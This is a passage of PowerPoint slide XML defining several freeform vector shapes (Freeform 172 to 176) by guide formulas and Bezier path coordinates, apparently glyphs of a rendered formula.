                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{727F8C0A-180A-48B3-8E7A-FA116C8819D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId67"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1881187" y="1755775"/>
              <a:ext cx="23813" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 32 h 63"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="63">
                  <a:moveTo>
                    <a:pt x="62" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="31" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="63"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62" y="3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1" name="Freeform 172">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E59C50B-CE37-4EB7-8E2A-1E8E0C275644}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId68"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2076450" y="1643063"/>
              <a:ext cx="50800" cy="153988"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 132"/>
                <a:gd name="T1" fmla="*/ 373 h 387"/>
                <a:gd name="T2" fmla="*/ 119 w 132"/>
                <a:gd name="T3" fmla="*/ 357 h 387"/>
                <a:gd name="T4" fmla="*/ 35 w 132"/>
                <a:gd name="T5" fmla="*/ 193 h 387"/>
                <a:gd name="T6" fmla="*/ 120 w 132"/>
                <a:gd name="T7" fmla="*/ 29 h 387"/>
                <a:gd name="T8" fmla="*/ 132 w 132"/>
                <a:gd name="T9" fmla="*/ 14 h 387"/>
                <a:gd name="T10" fmla="*/ 116 w 132"/>
                <a:gd name="T11" fmla="*/ 0 h 387"/>
                <a:gd name="T12" fmla="*/ 0 w 132"/>
                <a:gd name="T13" fmla="*/ 193 h 387"/>
                <a:gd name="T14" fmla="*/ 41 w 132"/>
                <a:gd name="T15" fmla="*/ 322 h 387"/>
                <a:gd name="T16" fmla="*/ 116 w 132"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 132 w 132"/>
                <a:gd name="T19" fmla="*/ 373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387">
                  <a:moveTo>
                    <a:pt x="132" y="373"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="365"/>
                    <a:pt x="128" y="363"/>
                    <a:pt x="119" y="357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="315"/>
                    <a:pt x="35" y="249"/>
                    <a:pt x="35" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="143"/>
                    <a:pt x="54" y="74"/>
                    <a:pt x="120" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="23"/>
                    <a:pt x="132" y="21"/>
                    <a:pt x="132" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="10"/>
                    <a:pt x="129" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="0"/>
                    <a:pt x="0" y="65"/>
                    <a:pt x="0" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="252"/>
                    <a:pt x="23" y="297"/>
                    <a:pt x="41" y="322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="359"/>
                    <a:pt x="104" y="387"/>
                    <a:pt x="116" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="387"/>
                    <a:pt x="132" y="377"/>
                    <a:pt x="132" y="37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2" name="Freeform 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D07AFF26-6074-4848-8A89-547D4883EACA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId69"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2143125" y="1693863"/>
              <a:ext cx="100013" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 36 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 28 w 259"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 28 w 259"/>
                <a:gd name="T11" fmla="*/ 187 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 84 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 187 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 98 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 30 h 218"/>
                <a:gd name="T26" fmla="*/ 115 w 259"/>
                <a:gd name="T27" fmla="*/ 71 h 218"/>
                <a:gd name="T28" fmla="*/ 115 w 259"/>
                <a:gd name="T29" fmla="*/ 187 h 218"/>
                <a:gd name="T30" fmla="*/ 93 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 151 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 143 w 259"/>
                <a:gd name="T39" fmla="*/ 187 h 218"/>
                <a:gd name="T40" fmla="*/ 143 w 259"/>
                <a:gd name="T41" fmla="*/ 98 h 218"/>
                <a:gd name="T42" fmla="*/ 184 w 259"/>
                <a:gd name="T43" fmla="*/ 30 h 218"/>
                <a:gd name="T44" fmla="*/ 202 w 259"/>
                <a:gd name="T45" fmla="*/ 71 h 218"/>
                <a:gd name="T46" fmla="*/ 202 w 259"/>
                <a:gd name="T47" fmla="*/ 187 h 218"/>
                <a:gd name="T48" fmla="*/ 180 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 201 w 259"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 238 w 259"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 259 w 259"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 230 w 259"/>
                <a:gd name="T57" fmla="*/ 187 h 218"/>
                <a:gd name="T58" fmla="*/ 230 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 186 w 259"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 137 w 259"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 99 w 259"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
                <a:gd name="T66" fmla="*/ 56 w 259"/>
                <a:gd name="T67"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9" h="218">
                  <a:moveTo>
                    <a:pt x="56" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="45" y="3"/>
                    <a:pt x="36" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="10" y="33"/>
                    <a:pt x="28" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="187"/>
                    <a:pt x="0" y="187"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="218"/>
                    <a:pt x="84" y="218"/>
                    <a:pt x="84" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="187"/>
                    <a:pt x="74" y="187"/>
                    <a:pt x="56" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="54"/>
                    <a:pt x="76" y="30"/>
                    <a:pt x="97" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="30"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="187"/>
                    <a:pt x="93" y="187"/>
                    <a:pt x="93" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="218"/>
                    <a:pt x="107" y="218"/>
                    <a:pt x="114" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="187"/>
                    <a:pt x="161" y="187"/>
                    <a:pt x="143" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="143" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="54"/>
                    <a:pt x="164" y="30"/>
                    <a:pt x="184" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="30"/>
                    <a:pt x="202" y="39"/>
                    <a:pt x="202" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="202" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="187"/>
                    <a:pt x="180" y="187"/>
                    <a:pt x="180" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="218"/>
                    <a:pt x="194" y="218"/>
                    <a:pt x="201" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="238" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="218"/>
                    <a:pt x="259" y="218"/>
                    <a:pt x="259" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="187"/>
                    <a:pt x="248" y="187"/>
                    <a:pt x="230" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="230" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="57"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="0"/>
                    <a:pt x="151" y="6"/>
                    <a:pt x="137" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="9"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="68" y="7"/>
                    <a:pt x="56" y="1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3" name="Freeform 174">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F94A4242-0810-4C09-BE4C-22070BEDAE72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId70"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2255837" y="1692275"/>
              <a:ext cx="90488" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 156 w 234"/>
                <a:gd name="T1" fmla="*/ 204 h 223"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 220 h 223"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 223"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 223"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 223"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 78 h 223"/>
                <a:gd name="T12" fmla="*/ 86 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 223"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 37 h 223"/>
                <a:gd name="T16" fmla="*/ 36 w 234"/>
                <a:gd name="T17" fmla="*/ 60 h 223"/>
                <a:gd name="T18" fmla="*/ 58 w 234"/>
                <a:gd name="T19" fmla="*/ 37 h 223"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 223"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 31 h 223"/>
                <a:gd name="T24" fmla="*/ 150 w 234"/>
                <a:gd name="T25" fmla="*/ 82 h 223"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 156 h 223"/>
                <a:gd name="T28" fmla="*/ 83 w 234"/>
                <a:gd name="T29" fmla="*/ 223 h 223"/>
                <a:gd name="T30" fmla="*/ 156 w 234"/>
                <a:gd name="T31" fmla="*/ 204 h 223"/>
                <a:gd name="T32" fmla="*/ 150 w 234"/>
                <a:gd name="T33" fmla="*/ 111 h 223"/>
                <a:gd name="T34" fmla="*/ 150 w 234"/>
                <a:gd name="T35" fmla="*/ 153 h 223"/>
                <a:gd name="T36" fmla="*/ 131 w 234"/>
                <a:gd name="T37" fmla="*/ 184 h 223"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 223"/>
                <a:gd name="T40" fmla="*/ 35 w 234"/>
                <a:gd name="T41" fmla="*/ 156 h 223"/>
                <a:gd name="T42" fmla="*/ 150 w 234"/>
                <a:gd name="T43" fmla="*/ 111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4" h="223">
                  <a:moveTo>
                    <a:pt x="156" y="204"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="220"/>
                    <a:pt x="209" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="220"/>
                    <a:pt x="234" y="220"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="222" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="187"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="78"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="86" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="52"/>
                    <a:pt x="24" y="60"/>
                    <a:pt x="36" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="60"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="58" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="33"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="31"/>
                    <a:pt x="82" y="31"/>
                    <a:pt x="86" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="31"/>
                    <a:pt x="150" y="46"/>
                    <a:pt x="150" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="83"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="32" y="223"/>
                    <a:pt x="83" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="223"/>
                    <a:pt x="132" y="219"/>
                    <a:pt x="156" y="204"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="164"/>
                    <a:pt x="150" y="175"/>
                    <a:pt x="131" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="192"/>
                    <a:pt x="90" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="35" y="175"/>
                    <a:pt x="35" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="131"/>
                    <a:pt x="78" y="113"/>
                    <a:pt x="150" y="11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4" name="Freeform 175">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FDDDAFD-A56A-42B1-AB60-35B86B491D92}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId71"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2347912" y="1693863"/>
              <a:ext cx="96838" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 249"/>
                <a:gd name="T1" fmla="*/ 26 h 218"/>
                <a:gd name="T2" fmla="*/ 56 w 249"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 249"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 249"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 19 w 249"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 42 w 249"/>
                <a:gd name="T11" fmla="*/ 33 h 218"/>
                <a:gd name="T12" fmla="*/ 42 w 249"/>
                <a:gd name="T13" fmla="*/ 187 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 249"/>
                <a:gd name="T15" fmla="*/ 187 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 249"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 19 w 249"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 249"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 249"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 98 w 249"/>
                <a:gd name="T25" fmla="*/ 187 h 218"/>
                <a:gd name="T26" fmla="*/ 76 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 76 w 249"/>
                <a:gd name="T29" fmla="*/ 99 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 30 h 218"/>
                <a:gd name="T32" fmla="*/ 172 w 249"/>
                <a:gd name="T33" fmla="*/ 74 h 218"/>
                <a:gd name="T34" fmla="*/ 172 w 249"/>
                <a:gd name="T35" fmla="*/ 187 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 249"/>
                <a:gd name="T37" fmla="*/ 187 h 218"/>
                <a:gd name="T38" fmla="*/ 132 w 249"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 249"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 229 w 249"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 249 w 249"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 228 w 249"/>
                <a:gd name="T47" fmla="*/ 187 h 218"/>
                <a:gd name="T48" fmla="*/ 206 w 249"/>
                <a:gd name="T49" fmla="*/ 187 h 218"/>
                <a:gd name="T50" fmla="*/ 206 w 249"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 249"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 76 w 249"/>
                <a:gd name="T55" fmla="*/ 2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9" h="218">
                  <a:moveTo>
                    <a:pt x="76" y="26"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="10"/>
                    <a:pt x="76" y="3"/>
                    <a:pt x="56" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="12" y="33"/>
                    <a:pt x="19" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="187"/>
                    <a:pt x="0" y="187"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="19" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="218"/>
                    <a:pt x="119" y="218"/>
                    <a:pt x="119" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="187"/>
                    <a:pt x="106" y="187"/>
                    <a:pt x="98" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="49"/>
                    <a:pt x="113" y="30"/>
                    <a:pt x="139" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="30"/>
                    <a:pt x="172" y="44"/>
                    <a:pt x="172" y="74"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="187"/>
                    <a:pt x="132" y="187"/>
                    <a:pt x="132" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="218"/>
                    <a:pt x="146" y="218"/>
                    <a:pt x="153" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="218"/>
                    <a:pt x="249" y="218"/>
                    <a:pt x="249" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="187"/>
                    <a:pt x="236" y="187"/>
                    <a:pt x="228" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="206" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="21"/>
                    <a:pt x="181" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="0"/>
                    <a:pt x="86" y="17"/>
                    <a:pt x="76" y="2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5" name="Freeform 176">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{129A4459-7A29-47C3-882E-2845326199C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId72"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2451100" y="1695450"/>
              <a:ext cx="92075" cy="130175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 236"/>
                <a:gd name="T1" fmla="*/ 30 h 328"/>
                <a:gd name="T2" fmla="*/ 216 w 236"/>
